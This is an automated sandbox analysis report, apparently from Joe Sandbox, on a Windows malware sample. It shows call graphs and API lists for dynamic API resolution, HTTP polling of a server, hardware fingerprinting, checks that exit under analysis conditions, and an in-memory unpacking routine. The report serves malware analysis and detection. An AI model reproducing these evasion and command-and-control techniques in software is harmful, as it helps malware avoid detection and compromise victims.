                                              • LoadLibraryA.KERNEL32(02BE8EF0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                              • LoadLibraryA.KERNEL32(02BE8F20,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                              • LoadLibraryA.KERNEL32(02BE8DD0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                              • LoadLibraryA.KERNEL32(02BE8C38,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                              • LoadLibraryA.KERNEL32(02BE8D10,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                              • GetProcAddress.KERNEL32(75290000,02BB21A8), ref: 0041A0DA
                                              • GetProcAddress.KERNEL32(75290000,02BE8E78), ref: 0041A0F2
                                              • GetProcAddress.KERNEL32(75290000,02BE5AB0), ref: 0041A10A
                                              • GetProcAddress.KERNEL32(75290000,02BE8C68), ref: 0041A123
                                              • GetProcAddress.KERNEL32(75290000,02BB2628), ref: 0041A13B
                                              • GetProcAddress.KERNEL32(6FC70000,02BB5A10), ref: 0041A160
                                              • GetProcAddress.KERNEL32(6FC70000,02BB2848), ref: 0041A179
                                              • GetProcAddress.KERNEL32(6FC70000,02BB5808), ref: 0041A191
                                              • GetProcAddress.KERNEL32(6FC70000,02BE8E30), ref: 0041A1A9
                                              • GetProcAddress.KERNEL32(6FC70000,02BE8E90), ref: 0041A1C2
                                              • GetProcAddress.KERNEL32(6FC70000,02BB2748), ref: 0041A1DA
                                              • GetProcAddress.KERNEL32(6FC70000,02BB2688), ref: 0041A1F2
                                              • GetProcAddress.KERNEL32(6FC70000,02BE8D28), ref: 0041A20B
                                              • GetProcAddress.KERNEL32(752C0000,02BB27C8), ref: 0041A22C
                                              • GetProcAddress.KERNEL32(752C0000,02BB26A8), ref: 0041A244
                                              • GetProcAddress.KERNEL32(752C0000,02BE8DA0), ref: 0041A25D
                                              • GetProcAddress.KERNEL32(752C0000,02BE8E18), ref: 0041A275
                                              • GetProcAddress.KERNEL32(752C0000,02BB28A8), ref: 0041A28D
                                              • GetProcAddress.KERNEL32(74EC0000,02BB5858), ref: 0041A2B3
                                              • GetProcAddress.KERNEL32(74EC0000,02BB5880), ref: 0041A2CB
                                              • GetProcAddress.KERNEL32(74EC0000,02BE8E00), ref: 0041A2E3
                                              • GetProcAddress.KERNEL32(74EC0000,02BB2828), ref: 0041A2FC
                                              • GetProcAddress.KERNEL32(74EC0000,02BB2888), ref: 0041A314
                                              • GetProcAddress.KERNEL32(74EC0000,02BB5830), ref: 0041A32C
                                              • GetProcAddress.KERNEL32(75BD0000,02BE8E48), ref: 0041A352
                                              • GetProcAddress.KERNEL32(75BD0000,02BB28C8), ref: 0041A36A
                                              • GetProcAddress.KERNEL32(75BD0000,02BE5C70), ref: 0041A382
                                              • GetProcAddress.KERNEL32(75BD0000,02BE8DE8), ref: 0041A39B
                                              • GetProcAddress.KERNEL32(75BD0000,02BE8FE0), ref: 0041A3B3
                                              • GetProcAddress.KERNEL32(75BD0000,02BB28E8), ref: 0041A3CB
                                              • GetProcAddress.KERNEL32(75BD0000,02BB25C8), ref: 0041A3E4
                                              • GetProcAddress.KERNEL32(75BD0000,02BE8FB0), ref: 0041A3FC
                                              • GetProcAddress.KERNEL32(75BD0000,02BE8F38), ref: 0041A414
                                              • GetProcAddress.KERNEL32(75A70000,02BB27E8), ref: 0041A436
                                              • GetProcAddress.KERNEL32(75A70000,02BE8FC8), ref: 0041A44E
                                              • GetProcAddress.KERNEL32(75A70000,02BE8F50), ref: 0041A466
                                              • GetProcAddress.KERNEL32(75A70000,02BE8F98), ref: 0041A47F
                                              • GetProcAddress.KERNEL32(75A70000,02BE8FF8), ref: 0041A497
                                              • GetProcAddress.KERNEL32(75450000,02BB2808), ref: 0041A4B8
                                              • GetProcAddress.KERNEL32(75450000,02BB2568), ref: 0041A4D1
                                              • GetProcAddress.KERNEL32(75DA0000,02BB2768), ref: 0041A4F2
                                              • GetProcAddress.KERNEL32(75DA0000,02BE8F68), ref: 0041A50A
                                              • GetProcAddress.KERNEL32(6F070000,02BB2868), ref: 0041A530
                                              • GetProcAddress.KERNEL32(6F070000,02BB2668), ref: 0041A548
                                              • GetProcAddress.KERNEL32(6F070000,02BB26C8), ref: 0041A560
                                              • GetProcAddress.KERNEL32(6F070000,02BE8F80), ref: 0041A579
                                              • GetProcAddress.KERNEL32(6F070000,02BB2908), ref: 0041A591
                                              • GetProcAddress.KERNEL32(6F070000,02BB25E8), ref: 0041A5A9
                                              • GetProcAddress.KERNEL32(6F070000,02BB25A8), ref: 0041A5C2
                                              • GetProcAddress.KERNEL32(6F070000,02BB26E8), ref: 0041A5DA
                                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                              • GetProcAddress.KERNEL32(75AF0000,02BE9328), ref: 0041A629
                                              • GetProcAddress.KERNEL32(75AF0000,02BE5B90), ref: 0041A641
                                              • GetProcAddress.KERNEL32(75AF0000,02BE9178), ref: 0041A659
                                              • GetProcAddress.KERNEL32(75AF0000,02BE90E8), ref: 0041A672
                                              • GetProcAddress.KERNEL32(75D90000,02BB2648), ref: 0041A693
                                              • GetProcAddress.KERNEL32(6F9D0000,02BE9310), ref: 0041A6B4
                                              • GetProcAddress.KERNEL32(6F9D0000,02BB2588), ref: 0041A6CD
                                              • GetProcAddress.KERNEL32(6F9D0000,02BE90A0), ref: 0041A6E5
                                              • GetProcAddress.KERNEL32(6F9D0000,02BE90B8), ref: 0041A6FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: HttpQueryInfoA$InternetSetOptionA
                                              • API String ID: 2238633743-1775429166
                                              • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                              • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                              • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                              • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1018 406364-406392 HttpOpenRequestA 1015->1018 1016->1018 1020 4064f5-4064f9 InternetCloseHandle 1018->1020 1021 406398-40639c 1018->1021 1020->1013 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 40639e-4063bf InternetSetOptionA 1021->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1030 1034 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1034 1035 40644d-406454 1027->1035 1034->1030 1037 406456-406480 InternetReadFile 1035->1037 1038 4064c7-4064ef InternetCloseHandle 1035->1038 1041 406482-406489 1037->1041 1042 40648b 1037->1042 1038->1020 1041->1042 1047 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1041->1047 1042->1038 1047->1037
                                              APIs
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                              • StrCmpCA.SHLWAPI(?,02BEB110), ref: 00406303
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                              • HttpOpenRequestA.WININET(00000000,GET,?,02BEA3E0,00000000,00000000,00400100,00000000), ref: 00406385
                                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                              • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                              • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                              • InternetCloseHandle.WININET(00000000), ref: 00406503
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                              • String ID: ERROR$ERROR$GET
                                              • API String ID: 3074848878-2509457195
                                              • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                              • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                              • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                              • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1068 411817-41181a 1067->1068 1069 41199e-4119bd strtok_s 1067->1069 1071 411821-411830 call 41a820 1068->1071 1072 411849-411858 call 41a820 1068->1072 1073 4118ad-4118be StrCmpCA 1068->1073 1074 4118cf-4118e0 StrCmpCA 1068->1074 1075 41198f-411999 call 41a820 1068->1075 1076 4118f1-411902 StrCmpCA 1068->1076 1077 411951-411962 StrCmpCA 1068->1077 1078 411970-411981 StrCmpCA 1068->1078 1079 411913-411924 StrCmpCA 1068->1079 1080 411932-411943 StrCmpCA 1068->1080 1081 411835-411844 call 41a820 1068->1081 1082 41185d-41186e StrCmpCA 1068->1082 1083 41187f-411890 StrCmpCA 1068->1083 1069->1065 1071->1069 1072->1069 1085 4118c0-4118c3 1073->1085 1086 4118ca 1073->1086 1087 4118e2-4118e5 1074->1087 1088 4118ec 1074->1088 1075->1069 1089 411904-411907 1076->1089 1090 41190e 1076->1090 1095 411964-411967 1077->1095 1096 41196e 1077->1096 1098 411983-411986 1078->1098 1099 41198d 1078->1099 1091 411930 1079->1091 1092 411926-411929 1079->1092 1093 411945-411948 1080->1093 1094 41194f 1080->1094 1081->1069 1103 411870-411873 1082->1103 1104 41187a 1082->1104 1105 411892-41189c 1083->1105 1106 41189e-4118a1 1083->1106 1085->1086 1086->1069 1087->1088 1088->1069 1089->1090 1090->1069 1091->1069 1092->1091 1093->1094 1094->1069 1095->1096 1096->1069 1098->1099 1099->1069 1103->1104 1104->1069 1107 4118a8 1105->1107 1106->1107 1107->1069
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessstrtok_s
                                              • String ID: block
                                              • API String ID: 3407564107-2199623458
                                              • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                              • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                              • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                              • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1158 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1158 1145->1155 1161 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1161 1162 4156af-4156b6 1155->1162 1158->1155 1293 415ac3-415ac6 1161->1293 1163 4157da-41585f call 41aad0 StrCmpCA 1162->1163 1164 4156bc-4156c3 1162->1164 1182 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1163->1182 1183 415865-41586c 1163->1183 1167 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1164->1167 1168 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1164->1168 1167->1163 1168->1163 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1168->1271 1182->1293 1188 415872-415879 1183->1188 1189 41598f-415a14 call 41aad0 StrCmpCA 1183->1189 1195 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1188->1195 1196 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1188->1196 1218 415a16-415a21 Sleep 1189->1218 1219 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1189->1219 1195->1189 1297 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1195->1297 1196->1189 1218->1127 1219->1293 1271->1163 1297->1189
                                              APIs
                                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02BE5AC0,?,0042110C,?,00000000), ref: 0041A82B
                                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                              • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpylstrlen$Sleepstrtok
                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                              • API String ID: 3630751533-2791005934
                                              • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                              • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                              • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                              • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                              APIs
                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                              • wsprintfA.USER32 ref: 00417640
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                              • String ID: :$C$\
                                              • API String ID: 3790021787-3809124531
                                              • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                              • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                              • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                              • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1344 47e003c-47e0047 1345 47e004c-47e0263 call 47e0a3f call 47e0e0f call 47e0d90 VirtualAlloc 1344->1345 1346 47e0049 1344->1346 1361 47e028b-47e0292 1345->1361 1362 47e0265-47e0289 call 47e0a69 1345->1362 1346->1345 1364 47e02a1-47e02b0 1361->1364 1366 47e02ce-47e03c2 VirtualProtect call 47e0cce call 47e0ce7 1362->1366 1364->1366 1367 47e02b2-47e02cc 1364->1367 1373 47e03d1-47e03e0 1366->1373 1367->1364 1374 47e0439-47e04b8 VirtualFree 1373->1374 1375 47e03e2-47e0437 call 47e0ce7 1373->1375 1377 47e04be-47e04cd 1374->1377 1378 47e05f4-47e05fe 1374->1378 1375->1373 1380 47e04d3-47e04dd 1377->1380 1381 47e077f-47e0789 1378->1381 1382 47e0604-47e060d 1378->1382 1380->1378 1386 47e04e3-47e0505 LoadLibraryA 1380->1386 1384 47e078b-47e07a3 1381->1384 1385 47e07a6-47e07b0 1381->1385 1382->1381 1387 47e0613-47e0637 1382->1387 1384->1385 1388 47e086e-47e08be LoadLibraryA 1385->1388 1389 47e07b6-47e07cb 1385->1389 1390 47e0517-47e0520 1386->1390 1391 47e0507-47e0515 1386->1391 1392 47e063e-47e0648 1387->1392 1397 47e08c7-47e08f9 1388->1397 1393 47e07d2-47e07d5 1389->1393 1394 47e0526-47e0547 1390->1394 1391->1394 1392->1381 1395 47e064e-47e065a 1392->1395 1398 47e07d7-47e07e0 1393->1398 1399 47e0824-47e0833 1393->1399 1400 47e054d-47e0550 1394->1400 1395->1381 1396 47e0660-47e066a 1395->1396 1403 47e067a-47e0689 1396->1403 1405 47e08fb-47e0901 1397->1405 1406 47e0902-47e091d 1397->1406 1407 47e07e4-47e0822 1398->1407 1408 47e07e2 1398->1408 1404 47e0839-47e083c 1399->1404 1401 47e0556-47e056b 1400->1401 1402 47e05e0-47e05ef 1400->1402 1409 47e056f-47e057a 1401->1409 1410 47e056d 1401->1410 1402->1380 1411 47e068f-47e06b2 1403->1411 1412 47e0750-47e077a 1403->1412 1404->1388 1413 47e083e-47e0847 1404->1413 1405->1406 1407->1393 1408->1399 1414 47e057c-47e0599 1409->1414 1415 47e059b-47e05bb 1409->1415 1410->1402 1416 47e06ef-47e06fc 1411->1416 1417 47e06b4-47e06ed 1411->1417 1412->1392 1418 47e084b-47e086c 1413->1418 1419 47e0849 1413->1419 1427 47e05bd-47e05db 1414->1427 1415->1427 1421 47e06fe-47e0748 1416->1421 1422 47e074b 1416->1422 1417->1416 1418->1404 1419->1388 1421->1422 1422->1403 1427->1400
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 047E024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 4e05440656ac91d43e019359d1968526cd0e188188a9e1e50960f830c214d4f7
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: C2528974A00269DFDB64CF69C984BACBBB1BF09304F1481D9E90DAB351DB70AA85DF14

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8E20), ref: 004198A1
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8E80), ref: 004198BA
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8E38), ref: 004198D2
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8E98), ref: 004198EA
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8E08), ref: 00419903
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BE5B80), ref: 0041991B
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB2388), ref: 00419933
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB2488), ref: 0041994C
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8E50), ref: 00419964
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8E68), ref: 0041997C
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8DD8), ref: 00419995
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB8DF0), ref: 004199AD
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BB2228), ref: 004199C5
                                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02BE60E8), ref: 004199DE
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                              • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
